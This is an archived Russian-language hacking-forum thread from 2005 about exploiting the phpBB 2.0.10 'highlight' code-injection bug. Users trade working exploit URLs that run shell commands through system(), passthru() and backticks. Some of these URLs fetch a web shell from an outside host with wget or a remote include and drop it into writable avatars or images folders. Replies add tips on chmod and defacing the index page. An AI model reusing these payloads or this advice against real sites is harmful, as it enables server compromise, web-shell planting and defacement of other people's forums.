phpBB>2.0.10 highlight [Архив] - Форум АНТИЧАТ

Просмотр полной версии : phpBB>2.0.10 highlight

*Van*

16.11.2005, 18:03

В общем, необходимо взломать форум phpbb 2.0.10 путём эксплуатации баги в highlight.
Мне не нужно взламывать конкретный форум, просто хочу научиться использовать эту багу.

Вот что я пробовал:
http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`pwd`.%2527
Выдаёт(там где должно быть имя чела):
/pub/home/taymen30/сайт/forum

Потом пробую:
http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd%20..;ls%20-l

Выдаёт:)\b#i

В чём я делаю ошибку?Может кто поможет...

k1b0rg

16.11.2005, 18:26

viewtopic.php?t=275&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'

*Van*

16.11.2005, 20:00

k1borg, спасибо! Ты мне помог, опираясь на твою подсказку я нашёл де-то на других форумах другой код. Но теперь возникла другая проблема. Например, делаю такой запрос:

http://форум/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=ls%20-l%20/usr/home/сайт/public_html/директория форума/images

Всё ОК, выдаёт все файлы. Смотрю, у директории avatars права drwxrwxrwx
Делаю запрос:

http://сайт/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=wget%20http://мой сайт.narod.ru/shell.php%20-P%20/usr/home/сайт/public_html/форум/images/avatars/

Затем смотрюнет ли шелла через ls- его нет ни в директории avatars нигде! =(

*Van*

17.11.2005, 00:27

Всё, народ, справился сам...только одно не получается:я когда закачиваю шелл на форум, то у него права становятся: -rw-------

То есть открыть его я не могу. Что мне делать-то?

Нужно чтобы права стали: -rw-rw----

Закачиваю fetch'ем

madnet

17.11.2005, 04:04

chmod 755 shell.php

Extrim

19.11.2005, 15:53

Че за белеберда коглда я ввожу:&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd ..;ls -l
Получаю:
)\b#i

dim_ok

19.11.2005, 16:26

попробуй воспользоваться поиском по форуму, уверен тем с таким содержанием не один десяток, а так возможно запрешено выполнение системных команд в php, пробуй инклюдинг - &test=http://site.com/shell.txt?&highlight=%2527.include($_GET[test]).%2527

dim_ok

19.11.2005, 17:26

Еще вопрос:
Почему после того как я ввожу &highlight=%2527.$poster=`$cmd`.%2527&cmd=cd ..;ls -l
Все ОК
Потом:
viewtopic.php?p=61259&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=wget%20http://сайт.narod.ru/remview.php%20-P%20/usr/local/www/http/
и тут все начинаеться пишет:
)\b#i

при заливке wget'ом так оно и будет, а если не заливается - возможно wget не установлен на сервере или нет прав на запись

Смотрю в
viewtopic.php?p=61259&highlight=%2527.$poster=%60$cmd%60.%2527&cmd=ls usr/local/www/http
И файлика чвоего не наблюдаю почемуто это так ????
его там может и не быть

*Van*

19.11.2005, 20:14

Попробуй залить GET'ом или fetch'ем.

k00p3r

19.11.2005, 20:32

Делай echo в индекс на крайняк и всё.

m0nzt3r

19.11.2005, 21:32

его там может и не быть
как вссегда наш многоуважаемый димка прав))
ls usr/local/www/http
ты воть туда и заливаешь???

Extrim

19.11.2005, 22:18

Попробуй залить GET'ом или fetch'ем.
Мне вот интересно что это такое fetch'емРозпишите плиз :_)

*Van*

20.11.2005, 12:37

Заливать файлы старайся в папку images-она часто открыта на запись. Ну или avatars.